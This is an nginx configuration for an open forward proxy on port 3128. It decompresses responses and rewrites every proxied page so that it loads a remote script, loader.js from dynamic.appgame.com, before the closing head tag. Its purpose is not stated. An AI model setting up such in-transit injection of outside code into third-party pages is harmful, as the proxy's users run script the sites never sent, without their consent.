worker_processes  1;
master_process	off;
daemon off;

events {
    worker_connections 1024;
}

http {      
        include       mime.types;
        default_type  application/octet-stream;

        sendfile        on;
        keepalive_timeout  65;

        client_body_buffer_size 128k;
        client_header_buffer_size 32k;
        large_client_header_buffers 4 64k;
        client_max_body_size 32m;

	error_log logs/error.log debug;
	access_log logs/access.log;

        server {
                listen 3128;
		resolver 8.8.8.8;

                location / {
                        gunzip on;
                        gunzip_force on;
                        gunzip_buffers 64 4k;

                        sub_filter_once on;
                        sub_filter </head> '<script type="text/javascript" src="http://dynamic.appgame.com/js/loader.js"></script></head>';

                        gzip on;
                        gzip_comp_level 9;
                        gzip_disable "msie6";
                        gzip_proxied off;
                        gzip_min_length 512;
                        gzip_buffers 16 8k;

                        proxy_redirect off;
                        proxy_http_version 1.1;
                        proxy_buffering off;
                        proxy_set_header "Accept-Encoding"  "gzip";
                        proxy_set_header "Host" $http_host;
                        proxy_set_header Connection "";
                        proxy_connect_timeout 180;
                        proxy_send_timeout 180;
                        proxy_read_timeout 180;
                        proxy_buffer_size 4k;
                        proxy_buffers 4 32k;
                        proxy_busy_buffers_size 64k;
                        proxy_temp_file_write_size 64k;
                        send_timeout 180;
                        proxy_pass http://$http_host$request_uri;
                }
        }
} 
